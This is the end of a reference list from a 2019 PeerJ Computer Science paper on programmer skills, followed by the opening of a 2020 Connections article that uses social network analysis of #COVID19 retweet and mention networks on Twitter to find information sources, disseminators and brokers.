task characteristics relate to job satisfaction and software quality? Information and Software Technology 51(3):627–639 DOI 10.1016/j.infsof.2008.08.006. Baylor University. 2017. ICPC history—the 2017 world champions. Available at http: //archive.is/yomFP. Behroozi M, Lui A, Moore I, Ford D, Parnin C. 2018. Dazed: measuring the cognitive load of solving technical interview problems at the whiteboard. In: Proceedings of the 40th international conference on software engineering: new ideas and emerging results, ICSE-NIER ’18. New York: ACM, 93–96. Bell D, Hall T, Hannay JE, Pfahl D, Acuna ST. 2009. Software engineering group work: personality, patterns and performance. In: SIGMIS CPR10 Proceedings of the 2010 ACM SIGMIS computer personnel research conference. Software engineering group work: personality, patterns and performance. New York: ACM, 43–47. Bloomfield A, Sotomayor B. 2016. A programming contest strategy guide. In: Proceed- ings of the 47th ACM technical symposium on computing science education. New York: ACM, 609–614. Borreguero F, Di Nitto E, Stebliuk D, Tamburri DA, Zheng C. 2015. Fathoming software evangelists with the D-index. In: Proceedings of the eighth international workshop on cooperative and human aspects of software engineering. Piscataway: IEEE Press, 85–88. Bradburn NM. 1969. The structure of psychological well-being. Chicago: Aldine Publish- ing Company. Brown BK, Campion MA. 1994. Biodata phenomenology: recruiters’ perceptions and use of biographical information in resume screening. Journal of Applied Psychology 79(6):897 DOI 10.1037/0021-9010.79.6.897. Burton BA, Hiron M. 2008. Creating informatics olympiad tasks: exploring the black art. Olympiads in Informatics 2:16–36. Capretz LF, Ahmed F. 2010. Why do we need personality diversity in software engineer- ing? ACM SIGSOFT Software Engineering Notes 35(2):1–11. Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 33/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.173#supplemental-information http://dx.doi.org/10.7717/peerj-cs.173#supplemental-information http://dx.doi.org/10.7717/peerj-cs.173#supplemental-information http://dx.doi.org/10.1109/MS.2017.31 http://dx.doi.org/10.1016/j.infsof.2008.08.006 http://archive.is/yomFP http://archive.is/yomFP http://dx.doi.org/10.1037/0021-9010.79.6.897 http://dx.doi.org/10.7717/peerj-cs.173 Corno G, Molinari G, Baños RM. 2016. Assessing positive and negative experiences: validation of a new measure of well-being in an Italian population. Rivista di psichiatria 51(3):110–115 DOI 10.1708/2304.24796. Cruz S, Da Silva FQ, Capretz LF. 2015. Forty years of research on personality in software engineering: a mapping study. Computers in Human Behavior 46:94–113 DOI 10.1016/j.chb.2014.12.008. Dagienė V, Futschek G. 2008. Bebras international contest on informatics and com- puter literacy: criteria for good tasks. In: International conference on informatics in secondary schools-evolution and perspectives. Springer, 19–30. Darcy DP, Ma M. 2005. Exploring individual characteristics and programming perfor- mance: implications for programmer selection. In: System Sciences, 2005. HICSS’05. Proceedings of the 38th annual Hawaii international conference on. Piscataway: IEEE, 314a–314a. DeMarco T, Lister T. 2013. Peopleware: productive projects and teams. Boston: Addison- Wesley. Diener E, Wirtz D, Tov W, Kim-Prieto C, Choi D-W, Oishi S, Biswas-Diener R. 2010. New well-being measures: short scales to assess flourishing and positive and negative feelings. Social Indicators Research 97(2):143–156 DOI 10.1007/s11205-009-9493-y. Digman JM. 1990. Personality structure: emergence of the five-factor model. Annual Review of Psychology 41(1):417–440 DOI 10.1146/annurev.ps.41.020190.002221. Du Plessis GA, Guse T. 2017. Validation of the scale of positive and negative expe- rience in a South African student sample. South African Journal of Psychology 47(2):184–197 DOI 10.1177/0081246316654328.. Dumitru. 2017. How to find a solution—topcoder. Available at http://archive.is/aQmhR. Evans GE, Simkin MG. 1989. What best predicts computer proficiency? Communications of the ACM 32(11):1322–1327 DOI 10.1145/68814.68817. Ford D, Barik T, Rand-Pickett L, Parnin C. 2017. The tech-talk balance: what technical interviewers expect from technical candidates. In: Proceedings of the 10th interna- tional workshop on cooperative and human aspects of software engineering. Piscataway: IEEE Press, 43–48. Ghory I. 2007. Using FizzBuzz to find developers who grok coding. Available at http: //archive.is/FGZKG. Golding P, Facey-Shaw L, Tennant V. 2006. Effects of peer tutoring, attitude and personality on academic performance of first year introductory programming students. In: Frontiers in education conference, 36th annual. Piscataway: IEEE, 7–12. Google Inc. 2017. Google Code Jam. Available at http://archive.is/yG5Kb. Google Inc. 2018. re:work—guide: shape the candidate experience. Available at http: //archive.is/TXtot. Graziotin D, Fagerholm F, Wang X, Abrahamsson P. 2017. On the unhappiness of software developers. In: Proceedings of the 21st international conference on evaluation and assessment in software engineering—EASE17. New York: ACM Press. Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 34/38 https://peerj.com http://dx.doi.org/10.1708/2304.24796 http://dx.doi.org/10.1016/j.chb.2014.12.008 http://dx.doi.org/10.1007/s11205-009-9493-y http://dx.doi.org/10.1146/annurev.ps.41.020190.002221 http://dx.doi.org/10.1177/0081246316654328. http://archive.is/aQmhR http://dx.doi.org/10.1145/68814.68817 http://archive.is/FGZKG http://archive.is/FGZKG http://archive.is/yG5Kb http://archive.is/TXtot http://archive.is/TXtot http://dx.doi.org/10.7717/peerj-cs.173 Graziotin D, Fagerholm F, Wang X, Abrahamsson P. 2018. What happens when software developers are (un)happy. Journal of Systems and Software 140:32–47 DOI 10.1016/j.jss.2018.02.041. Graziotin D, Wang X, Abrahamsson P. 2014. Happy software developers solve problems better: psychological measurements in empirical software engineering. PeerJ 2:e289 DOI 10.7717/peerj.289. Graziotin D, Wang X, Abrahamsson P. 2015. How do you feel, developer? An explana- tory theory of the impact of affects on programming performance. PeerJ Computer Science 1:e18 DOI 10.7717/peerj-cs.18. Gregor S. 2006. The nature of theory in information systems. MIS Quarterly 30(3):611–642. Haybron DM. 2001. Happiness and pleasure. Philosophy and Phenomenological Research 62(3):501–528 DOI 10.1111/j.1933-1592.2001.tb00072.x. Haybron DM. 2005. On being happy or unhappy. Philosophy and Phenomenological Research 71(2):287–317 DOI 10.1111/j.1933-1592.2005.tb00450.x. Johnson P, Ekstedt M. 2015. The Tarpit—a general theory of software engineering. Information and Software Technology 70:181–203. Johnson P, Ekstedt M, Jacobson I. 2012. Where’s the theory for software engineering? IEEE Software 29(5):92–95. Johnson P, Jacobson I, Goedicke M, Kajko-Mattsson M. 2013. 2nd SEMAT workshop on a general theory of software engineering (GTSE 2013). In: Proceedings of the 2013 international conference on software engineering. Piscataway: IEEE, 1525–1526. Jovanović V. 2015. Beyond the PANAS: incremental validity of the scale of positive and negative experience (SPANE) in relation to well-being. Personality and Individual Differences 86:487–491 DOI 10.1016/j.paid.2015.07.015. Kajko-Mattsson M. 2012. Software engineering suffers from the beehive syndrome. In: Information science and digital content technology (ICIDT). Piscataway: IEEE, 49–52. Karimi Z, Baraani-Dastjerdi A, Ghasem-Aghaee N, Wagner S. 2016. Links between the personalities, styles and performance in computer programming. Journal of Systems and Software 111:228–241 DOI 10.1016/j.jss.2015.09.011. Kemkes G, Vasiga T, Cormack G. 2006. Objective scoring for computing competition tasks. In: International conference on informatics in secondary schools—evolution and perspectives. Berlin, Heidelberg: Springer, 230–241. Kumar V, Pedanekar N. 2016. Mining shapes of expertise in online social Q&A commu- nities. In: Proceedings of the 19th ACM conference on computer supported cooperative work and social computing companion. New York: ACM, 317–320. Lang FR, Lüdtke O, Asendorpf JB. 2001. Testgüte und psychometrische Äquivalenz der deutschen Version des Big Five Inventory (BFI) bei jungen, mittelalten und alten Erwachsenen. Diagnostica 47(3):111–121 DOI 10.1026//0012-1924.47.3.111. Layman L. 2007. Changing students’ perceptions: an analysis of the supplementary benefits of collaborative software development. In: 19th conference on software engineering education and training (Cseet 2006). Piscataway: IEEE, 159–166. LeetCode. 2018. LeetCode. Available at https://leetcode.com/ . Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 35/38 https://peerj.com http://dx.doi.org/10.1016/j.jss.2018.02.041 http://dx.doi.org/10.7717/peerj.289 http://dx.doi.org/10.7717/peerj-cs.18 http://dx.doi.org/10.1111/j.1933-1592.2001.tb00072.x http://dx.doi.org/10.1111/j.1933-1592.2005.tb00450.x http://dx.doi.org/10.1016/j.paid.2015.07.015 http://dx.doi.org/10.1016/j.jss.2015.09.011 http://dx.doi.org/10.1026//0012-1924.47.3.111 https://leetcode.com/ http://dx.doi.org/10.7717/peerj-cs.173 Li F, Bai X, Wang Y. 2013. The scale of positive and negative experience (SPANE): psychometric properties and normative data in a large Chinese sample. PLOS ONE 8(4):e61137 DOI 10.1371/journal.pone.0061137. Matturro G. 2013. Soft skills in software engineering: a study of its demand by software companies in Uruguay. In: 2013 6th international workshop on cooperative and human aspects of software engineering (CHASE). Piscataway: IEEE, 133–136. McCrae RR, Costa PT. 1989. Reinterpreting the Myers-Briggs type indicator from the perspective of the five-factor model of personality. Journal of Personality 57(1):17–40 DOI 10.1111/j.1467-6494.1989.tb00759.x. McCrae RR, John OP. 1992. An introduction to the five-factor model and its applica- tions. Journal of Personality 60(2):175–215 DOI 10.1111/j.1467-6494.1992.tb00970.x. McDowell GL. 2013. What are Gayle Laakmann McDowell’s favorite questions to ask in a software engineering interview, and what does she look for in evaluating the candidate’s performance? Available at https://archive.is/N31RD. McDowell GL. 2015. Cracking the coding interview—189 programming questions and solutions. 6th edition. Palo Alto: CareerCup. McDowell GL. 2017. What is a typical software engineering interview with you like? Available at http://archive.is/hR0jL. Merriam-Webster. 2016. The Merriam-Webster Dictionary New Edition (c) 2016. Springfield: Merriam-Webster, Inc., 939. Mongan J, Kindler NS, Giguère E. 2012. Programming interviews exposed: secrets to landing your next job. Hoboken: John Wiley & Sons. Murray J. 2013. Likert data: what to use, parametric or non-parametric? International Journal of Business and Social Science 4(11):258–264. Mäntylä MV, Petersen K, Lehtinen TOA, Lassenius C. 2014. Time pressure: a controlled experiment of test case development and requirements review. In: Jalote P, Briand L, Hoek AVD, eds. Proceedings of the 36th international conference on software engineering, ICSE 2014. New York: ACM Press, 83–94. Neuroskeptic. 2015. P-values and exploratory research. Discover Magazine. [Blog Post] Available at http://blogs.discovermagazine.com/neuroskeptic/2015/03/31/p-values- and-exploratory-research/#.XEma8s17lhE. Oswald AJ, Proto E, Sgroi D. 2015. Happiness and productivity. Journal of Labor Economics 33(4):789–822 DOI 10.1086/681096. Pal A, Harper FM, Konstan JA. 2012. Exploring question selection bias to identify experts and potential experts in community question answering. ACM Transactions on Information Systems 30(2):1–28 DOI 10.1145/2180868.2180872. Pittenger DJ. 1993. Measuring the MBTI... and coming up short. Journal of Career Planning and Employment 54(1):48–52. Rahm T, Heise E, Schuldt M. 2017. Measuring the frequency of emotionsvalidation of the scale of positive and negative experience (SPANE) in Germany. PLOS ONE 12(2):e0171288 DOI 10.1371/journal.pone.0171288. Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 36/38 https://peerj.com http://dx.doi.org/10.1371/journal.pone.0061137 http://dx.doi.org/10.1111/j.1467-6494.1989.tb00759.x http://dx.doi.org/10.1111/j.1467-6494.1992.tb00970.x https://archive.is/N31RD http://archive.is/hR0jL http://blogs.discovermagazine.com/neuroskeptic/2015/03/31/p-values-and-exploratory-research/#.XEma8s17lhE http://blogs.discovermagazine.com/neuroskeptic/2015/03/31/p-values-and-exploratory-research/#.XEma8s17lhE http://dx.doi.org/10.1086/681096 http://dx.doi.org/10.1145/2180868.2180872 http://dx.doi.org/10.1371/journal.pone.0171288 http://dx.doi.org/10.7717/peerj-cs.173 Rahman MM, Roy CK. 2014. An insight into the pull requests of GitHub. In: Devanbu P, Kim S, Pinzger M, eds. The 11th working conference. An insight into the pull requests of GitHub. New York: ACM Press, 364–367. Ralph P, Johnson P, Jordan H. 2013. Report on the first SEMAT workshop on general theory of software engineering (GTSE 2012). ACM SIGSOFT Software Engineering Notes 38(2):26–28 DOI 10.1145/2439976.2439999. Revilla MA, Manzoor S, Liu R. 2008. Competitive learning in informatics: the UVa online judge experience. Olympiads in Informatics 2:131–148. Rubin M. 2017. Do p values lose their meaning in exploratory analyses? It depends how you define the familywise error rate. Review of General Psychology 21(3):269 DOI 10.1037/gpr0000123. Russell JA. 2003. Core affect and the psychological construction of emotion. Psychological Review 110(1):145–172 DOI 10.1037/0033-295X.110.1.145. Sackman H, Erikson WJ, Grant EE. 1968. Exploratory experimental studies comparing online and offline programming performance. Communications of the ACM 11(1):3–11 DOI 10.1145/362851.362858. Scacchi W. 1995. Understanding software productivity. In: Software engineering and knowledge engineering: trends for the next decade. Singapore: World Scientific, 273–316. Shoaib L, Nadeem A, Akbar A. 2009. An empirical evaluation of the influence of human personality on exploratory software testing. In: INMIC09: IEEE 13th international multitopic conference. An empirical evaluation of the influence of human personality on exploratory software testing. Piscataway: IEEE, 1–6. Siegmund J, Kstner C, Liebig J, Apel S, Hanenberg S. 2014. Measuring and modeling programming experience. Empirical Software Engineering 19(5):1299–1334 DOI 10.1007/s10664-013-9286-4. Silva AJ, Caetano A. 2013. Validation of the flourishing scale and scale of positive and negative experience in Portugal. Social Indicators Research 110(2):469–478 DOI 10.1007/s11205-011-9938-y. Singh K. 2007. Quantitative social research methods. New Delhi: Sage. Steinmayr R, Meißner A, Weidinger AF, Wirthwein L. 2014. Academic achievement. In: Meyer LH, ed. Oxford bibliographies online: education. New York: Oxford University Press. Sumi K. 2014. Reliability and validity of japanese versions of the flourishing scale and the scale of positive and negative experience. Social Indicators Research 118(2):601–615 DOI 10.1007/s11205-013-0432-6. Teles VM, De Oliveira CET. 2003. Reviewing the curriculum of software engineering undergraduate courses to incorporate communication and interpersonal skills teaching. In: null. Piscataway: IEEE, 158. Thoms P, McMasters R, Roberts MR, Dombkowski DA. 1999. Resume characteristics as predictors of an invitation to interview. Journal of Business and Psychology 13(3):339–356 DOI 10.1023/A:1022974232557. Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 37/38 https://peerj.com http://dx.doi.org/10.1145/2439976.2439999 http://dx.doi.org/10.1037/gpr0000123 http://dx.doi.org/10.1037/0033-295X.110.1.145 http://dx.doi.org/10.1145/362851.362858 http://dx.doi.org/10.1007/s10664-013-9286-4 http://dx.doi.org/10.1007/s11205-011-9938-y http://dx.doi.org/10.1007/s11205-013-0432-6 http://dx.doi.org/10.1023/A:1022974232557 http://dx.doi.org/10.7717/peerj-cs.173 Urness T. 2017. Using interview questions as short-term programming assignments in CS2. Journal of Computing Sciences in Colleges 32(5):170–177. Wohlin C, Šmite D, Moe NB. 2015. A general theory of software engineering: bal- ancing human, social and organizational capitals. Journal of Systems and Software 109:229–242 DOI 10.1016/j.jss.2015.08.009. Yilmaz M, O’Connor RV, Colomo-Palacios R, Clarke P. 2017. An examination of personality traits and how they impact on software development teams. Information and Software Technology 86:101–122 DOI 10.1016/j.infsof.2017.01.005. Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 38/38 https://peerj.com http://dx.doi.org/10.1016/j.jss.2015.08.009 http://dx.doi.org/10.1016/j.infsof.2017.01.005 http://dx.doi.org/10.7717/peerj-cs.173 work_incs6r2ovzfh7ajrv56v5dou4i ---- 129© 2020 Authors. This work is licensed under the Creative Commons Attribution 4.0 License (https://creativecommons.org/licenses/by/4.0/) CONNECTIONS Issue 1 | Vol. 40Article | DOI: 10.21307/connections-2019.018 COVID-19 Health Communication Networks on Twitter: Identifying Sources, Disseminators, and Brokers Ian Kim* and Thomas W. Valente Department of Preventive Medicine, Keck School of Medicine, University of Southern California, Los Angeles, CA. *E-mail: iank@usc.edu Abstract Coronavirus disease of 2019 (COVID-19)’s devastating effects on the physical and mental health of the public are unlike previous medical crises, in part because of people’s collective access to communication technologies. Unfortunately, a clear understanding of the diffusion of health information on social media is lacking, which has a potentially negative impact on the effectiveness of emergency communication. This study applied social network analysis approaches to examine patterns of #COVID19 information flow on Twitter. A total of 1,404,496 publicly available tweets from 946,940 U.S. users were retrieved and analyzed. Particular attention was paid to the structures of retweet and mention networks and identification of influential users: information sources, disseminators, and brokers. Overall, COVID-19 information was not transmitted efficiently. Findings pointed to the importance of fostering connections between clusters to promote the diffusion in both networks. Lots of localized clusters limited the spread of timely information, causing difficulty in establishing any momentum in shaping urgent public actions. Rather than health and communication professionals, there was dominant involvement of non-professional users responsible for major COVID-19 information generation and dissemination, suggesting a lack of credibility and accuracy in the information. Inadequate influence of health officials and government agencies in brokering information contributed to concerns about the spread of dis/misinformation to the public. Significant differences in the type of influential users existed across roles and across networks. Conceptual and practical implications for emergency communication strategies are discussed. Keywords COVID, Information diffusion, Health communication, Social network analysis, Twitter. Since the first case of Coronavirus Disease of 2019 (COVID-19) was confirmed in the United States on January 21, 2020, over 13 million people in the U.S. have confirmed cases of COVID-19. Despite multiple national- and state-wide interventions and prevention measures including banning non-essential travel and stay-at-home orders, on April 12, the USA became the nation with the most deaths globally. As of December 2, the U.S. death toll surpassed 271,000. Providing up-to-date, accurate information, deli- vering key messages timely to the public, and controlling the spread of dis/misinformation can play a crucial role in managing epidemics (Homeland Security Council (US), 2006; World Health Organization, 2009; Centers for Disease Control and Prevention, 2014; Department of Homeland Security, 2018). COVID-19’s devastating effects on the physical and mental health of the public are unlike previous medical crises, 130 COVID-19 Twitter Network in part because of people’s collective access to communication technologies. COVID-19 is the first pandemic of its kind in the age of social media. The amount and nature of information available to the public has changed significantly and is constantly evolving. Unfortunately, a crucial but surprisingly understudied phenomenon is the diffusion of health information on social media (Zhou et al., 2018; Aramburu et al., 2020). Twitter, a microblogging service, has become one of the most important sources of realtime news updates, with more than 64 million users in the U.S. (Kemp, 2020). According to a recently published Pew Research Center report, 68% of American adults get news on social media and 71% of Twitter users responded they use it to get daily news (Matsa and Shearer, 2018). Twitter users send and receive short posts called tweets about any topic. Tweets can be up to 280 characters long and can include user mentions and keywords. Users can forward other users’ tweets and these forwarded messages are called retweets. Mentions can be used with the at symbol “@” before a username to identify a specific user. By retweeting or mentioning, users are interacting with other users and share information in a conversation-like manner (Wang et al., 2015). The hashtag symbol “#” can be used before a relevant keyword to initiate conversations or contribute to discussions of existing topics by showing their tweets in Twitter search. The use of the hashtag on Twitter indicates self-association of a user with an issue (Gruzd et al., 2011; Gleason, 2013). As users interact in Twitter space, they form connections that emerge into complex social network structures. Essentially, the connections are asymmetric, since a user who is retweeted or mentioned by another user does not necessarily have to reciprocate by retweeting or mentioning them back. Due to this asymmetry, users can re-create and reinforce traditional hierarchical network structures in Twitter by relying on just a few information sources or by choosing to limit interactions to a select group of similar others (Himelboim et al., 2017). Thus, the connections built among users are indicators of information sharing and network structures reflect patterns of information flow (Himelboim et al., 2017; Majmundar et al., 2018). There are many studies that have examined the structure of communication networks on Twitter that provide insights about information flow during political campaigns and social movements (Himelboim et al., 2012; Ansari, 2013; Harris et al., 2014; Kruikemeier, 2014; Shin et al., 2017, 2018; Recuero et al., 2019). The patterns of communication and influential groups can vary across topics, cultures, or languages. Although few recent studies investigated Ebola information dissemination patterns (Harris et al., 2018; Liang et al., 2019), their analysis was limited to retweet network, which together with mention network can provide an understanding of information flow on Twitter (Conover et al., 2011). To the best of our knowledge, this is the first study to examine both the retweet and mention networks to understand the diffusion of health information on Twitter among Americans during a pandemic. Structural characteristics were examined at the network level to address our overarching research question: Is the current Twitter’s COVID-19 communication network effectively leveraged to facilitate the flow of valid information during this crisis? Information can diffuse most effectively during crises if the network is sufficiently dense with low rates of clustering (Himelboim et al., 2017). Ideally, the Twitter COVID-19 communication network would have large audience and spread information quickly. Thus, we evaluated information flow in the retweet and mention networks with particular attention paid to its connectivity, modularity and direction of information flow. Influential COVID-19 Twitter users were identified as information sources, disseminators and brokers. Ideally, COVID-19 information sources would be medical/health professionals to emphasize credibility, disseminators would be communication/journalism professionals to maximize reach, and brokers would be public health and government officials to ensure that information is accurate and continues to flow (World Health Organization, 2009; Centers for Disease Control and Prevention, 2014). Thus, the aim of this study was to determine the characteristics of COVID-19 Twitter users by comparing the pro- fessional categorizations by their roles as sources, disseminators, or brokers in the retweet and mention networks. We hope this study will significantly contribute to public health by helping devise more effective emergency communication strategies and ultimately help mitigate the spread of disease and reduce misinformation. Methods Data We retrieved all publicly available tweets and user information from April 13, 2020, 08:00:00 AM, to April 16, 2020, 07:59:59 AM, GMT (UTC +0), using the Twitter API with the query “contains: #COVID19 and country code: USA and language: English.” This time period was chosen because the U.S. became the nation with the highest number of deaths due to 131 CONNECTIONS COVID-19 on April 12 and it was predicted the highest U.S. daily death rate would occur on April 15. We selected 8 AM (instead of midnight) as the temporal boundary between days because the number of tweets started increasing around 8 AM and reached its peak around 8 PM each day. Figure 1 shows the distribution of the tweets that used #COVID19 during the study period. The Twitter users’ usernames, tweets, hashtags, retweet and mention relationships and self-descriptions were collected. We did not include replies to reduce the likelihood of repetition, losing context information, or producing unreliable data caused by Twitter’s new feature, “hide reply.” Construction of retweet and mention networks The data were converted into social network format using the R package “rtweet” (Kearney, 2019). We constructed retweet and mention networks as previously reported (Yang and Counts, 2010; Harris et al., 2014; Takeichi et al., 2015; Himelboim et al., 2017). In the retweet network, each node represents a Twitter user and a directed edge is attached from user B to user A, if user B retweets a tweet originally posted by user A. The mention network was constructed in the same manner based on @username mentioning. That is, a directed edge is constructed from B to A, if user B mentions user A in his/her tweet. The opposite directions of edges in these networks therefore represent potential pathways for information flow. Figure 2 shows (a) how we built the networks and (b) how information is spread in the networks. These two network datasets contained a total of 1,404,496 directed relationships (ties) from 946,940 users (nodes). The R package “igraph” (Csardi and Nepusz, 2006) was used to calculate network- level and user-level metrics, to identify overall network structures and influential users and to provide insights for information flow. Analyses were conducted on the whole three-day set, separately on retweet and mention networks in order to compare them. The networks were visualized using the library “NetworkX” (Hagberg et al., 2008) for programming language Python. In order to focus on detailed elements and to give a spatial understanding of social relations (i.e., segregation, interaction, and clustering), smaller networks were created using one- hour subsets of the data (Martin III, 2012; Moody et al., 2005). The time period of April 13, 2020, 05:00:00 PM to 05:59:59 PM, GMT (UTC +0), was chosen for the subset to display because it provided a finer representation of network structures than other time periods and it had the largest amount of information for both retweet and mention networks that our lab computers could analyze. The subset network’s structure was representative of the whole network. Initial visualizations were attempted on each one-hour subset individually and results were very similar, so the finest representation was included in the current study. The coefficient of variation (CV) was calculated for each of the network measures: CVs for degree centrality=0.34 for the retweet and 0.37 for the mention networks across 72 one-hour subsets; CVs for density=0.58 for the retweet and 0.62 for the mention Figure 1: Volume of #COVID19 tweets from April 13, 2020, 08:00:00 AM, to April 16, 2020, 07:59:59 AM, GMT (UTC +0), with 5 minutes time intervals. 132 COVID-19 Twitter Network networks across 72 one-hour subsets, respectively. This indicates the network metric values for the separate one-hour slices are relatively similar. Network level Understanding the overall structure of a network is key for understanding how information flows among its users (Hinds and McGrath, 2006; Hossain and Kuti, 2010; Valente, 1995, 2010). Typical network level metrics are size, average path length, network diameter, rates of reciprocity and transitivity, density, as well as clustering measured as the degree of modularity and the network average clustering coefficient. Twitter users often form clusters composed of users who are more interconnected among themselves than others in the network. Within clusters, information tends to flow fast, while across clusters information flow is often restricted by limited connectivity available across clusters. We identified clusters using the Clauset–Newman–Moore algorithm to define the boundaries of information flow (Clauset et al., 2004). Modularity of each network was computed to measure the interconnectedness of Figure 2: Toy networks: (a) retweet and mention networks; (b) information diffusion network; (c) influential user identification in the retweet and mention networks. 133 CONNECTIONS clusters using the Girvan–Newman algorithm (Girvan and Newman, 2002). Higher scores indicated that the clusters are more distinct or separated from one another (range 0=clusters completely overlap to 1=no connections between clusters). While modularity captures the extent to which clusters are distinct from one another, it is often unable to detect small clusters (Fortunato and Barthelemy, 2007; Kaalia and Rajapakse, 2019). To investigate the network in more depth, density between clusters was calculated as the sum of existing ties between two clusters divided by total possible number of ties between them (range 0=no connection to 1=complete connection). User level In-degree, out-degree, and betweenness centrality metrics were used to identify influential users (Freeman, 1979; Valente, 2010). Although there is no fixed ratio or standard approach to identify the number of influential users in a given network, top 10 users with highest centrality scores or more has been considered enough to provide an indication of major direction of information flow in previous studies (Anger and Kittl, 2011; Himelboim et al., 2017; Recuero et al., 2019; Giglou et al., 2020). Given the large size of our data, this study identified a total of 600 influential users from the retweet and mention networks. On Twitter, retweets and mentions are sent from one user to another. The predominant direction of such connections determines the information flow. In-degree centrality measures the number of times a user received retweets or mentions and those with high in-degree indicate the user is a major source of information for others (Yang and Counts, 2010; Morris et al., 2012; Littau and Jahng, 2016). Thus, we identified users who had the top 100 in-degree scores in each network as information sources. Out- degree centrality measures the number of outgoing connections a user has. If a user frequently retweets or mentions other users, the user will have high out- degree, and high out-degree will indicate the user is an initiator of large proportions of ties. Thus, we identified users who had the top 100 out-degree centrality scores in each network as information disseminators. Betweenness centrality measures the frequency a user lies on the shortest path between other users (Freeman, 1977, 1979). A user with high betweenness has more information passing through them and a higher number of other people depend on that user to get information, and without that user, groups of people will be much less connected. Thus, we can use this metric to find users who are communication controllers in a given network. We identified users who had the top 100 betweenness centrality scores in each network as information brokers. We assume that all of the connections in these networks can diffuse information equally and so centrality measures were not weighted. During public health emergencies, health professionals have an important role to ensure the quality of shared information; likewise, the roles of communication professionals to timely disseminate the information with clear directions and of government officials to manage and maintain information flow are crucial in mitigating the effects of a pandemic (World Health Organization, 2009; Centers for Disease Control and Prevention, 2014). Interaction and cooperation between health professionals, communication professionals, and the government are critical during a pandemic (World Health Organization, 2009; Centers for Disease Control and Prevention, 2014). After identifying the information sources, disseminators and brokers, a conceptual assessment was conducted to under stand the nature of influential users in the retweet and mention networks. Regarding the nature of users, we classified the users into four types, based on their self-descriptions. Healthcare providers and researchers/scientists were classified as health professionals. People who disseminate news and information to serve the public interest such as media broadcasters, journalists, and reporters were classified as communication professionals. Politicians, policy makers, and national agencies were classified as government officials. Public figures and all other ordinary individuals who are simply using Twitter to share personal views were classified as non- professionals. The user type classification results were compared across roles and across networks using Fisher’s exact test. Results Network level The retweet network had 646,183 ties from 438,821 users, whereas the mention network had 758,313 ties from 531,019 users. Overall, COVID-19 information was not transmitted efficiently. In both networks, information flowed in one direction; the flow was slow; both retweet and mention networks were sparse and consisted of many small clusters; the clusters were disconnected from each other; and shared information was less likely to reach the entire group. Both networks exhibited quite similar structure. Table 1 summarizes metrics from the network level analyses. In both retweet and mention networks, low levels of mutuality of connections among users indicated 134 COVID-19 Twitter Network the information flow is unidirectional: retweet network, reciprocity=0.268% and transitivity=0.016%; and mention network, reciprocity = 0.482% and transitivity =0.018%. Both networks exhibited long average path lengths, implying information may diffuse slowly and less evenly: on average, users were separated by 12 others in the retweet network and 17 others in the mention network. Both networks were divided into a large number of clusters: 12,519 clusters in retweet network and 28,528 clusters in mention network. Information was not likely to be shared between clusters: average clustering coefficients calculated for each network were 0.012 in retweet network and 0.008 in mention network. Users had dense connections with other users within clusters but sparse connections between users in different clusters: although it was slightly lower in retweet network, both networks revealed high modularity with scores of 0.782 in retweet network and 0.797 in mention network. Both retweet and mention networks showed very low density: density scores were 0.0000034 in retweet network and 0.0000027 in mention network. User level Degree analyses revealed that a very small number of users determined the major COVID-19 information flow in both retweet and mention networks. The degree distributions in both networks tended to be scale-free, suggesting a hierarchical structure. The in-degree values of all users in the retweet network ranged between 0 and 11,954 (N=438,821, M=1.47, Med=0), the out-degree values between 0 and 158 (N=438,821, M=1.47, Med=1), and the betweenness values between 0 and 43,409,213 (N=438,821, M=2,894.66, Med=0). In the mention network, the in-degree values of all users ranged between 0 and 11,608 (N=531,019, M=1.43, Med=0), the out-degree values between 0 and 187 (N=531,019, M=1.43, Med=1), and the betweenness values between 0 and 215,538,020 (N=531,019, M=16,452.62, Med=0). All degree distributions were highly right-skewed: retweet network, skewness and kurtosis scores were 132.10 and 21,154.49 for in-degree, 12.43 and 491.54 for out-degree, and 123.89 and 19,750.70 for betweenness; mention network, 140.25 and 24,930.94 for in-degree, 13.22 and 537.58 for out-degree, and 125.39 and 17,758.65 for betweenness. The in-degree of the identified information sources (top 100) in the retweet network was between 705 and 11,954 (N=100, M=2,681, Med=1,506), the out- degree of the identified information disseminators was between 32 and 158 (N=100, M=47, Med=38), and the betweenness of the identified information brokers was between 2,728,657 and 43,309,213 (N=100, M=9,433,471, Med=6,886,086). In the men- tion network, the in-degree of the identified infor- mation sources was between 749 and 11,608 (N=100, M=2,560, Med=1,815), the out-degree of the identified information disseminators was between 39 and 187 (N=100, M=62, Med=52), and the betweenness of the identified information brokers was between 15,904,090 and 215,538,020 (N=100, M=67,239,434, Med=40,851,672). Table 2 compares the summary statistics of the degree distribution of influential users and of all users. Both networks followed a power-law degree distribution, providing evidence of scale-free, hierarchical structures: in-degree α=0.957, R2=0.694, p<0.001 and out-degree α=1.860, R2=0.961, p<0.001 were calculated in the retweet network; in-degree α=1.019, R2=0.704, p<0.001 and out-degree α=1.980, R2=0.964, p<0.001 were calculated in the mention network. Figure 3 shows the scale-free in-and out- degree distributions on a log–log scale with the raw score distributions on a histogram. The user type classification results revealed that, in both networks, the major COVID-19 information being shared among Twitter users was primarily authored by non-professionals and government officials; the information was primarily disseminated Table 1. Network metrics for the retweet and mention networks. Network Retweet Mention Number of nodes 438,821 531,019 Number of edges (directed) 646,183 758,313 Diameter (largest connected component) 35 46 Average path length 12.09 16.58 Reciprocity 0.002678 0.004815 Transitivity 0.000161 0.000182 Number of clusters 12,519 28,528 Average clustering coefficient 0.012 0.008 Modularity 0.782 0.797 Density < 0.001 < 0.001 135 CONNECTIONS by non-professionals; and health professionals played a major role in brokering information. The classified types of influential users in different roles in each network were all statistically significantly different from one another (all ps<0.001). Significant difference across networks was observed in the composition of the identified information brokers at α=0.10: Brokers in the retweet network were most frequently healthcare providers and ordinary citizens, with a near absence of government officials whereas brokers in the mention network were most often research scientists followed by healthcare workers. Table 3 summarizes the results of user level analyses. Table 4 shows the p-values obtained from user type composition comparison across roles and across networks using Fisher’s exact test. Retweet network Information sources, the top 100 on in-degree, were almost evenly divided among the four user types: health professionals, 20%; communication professionals, 16%; government officials, 28%; and non-professionals, 36%. In contrast, information disseminators, 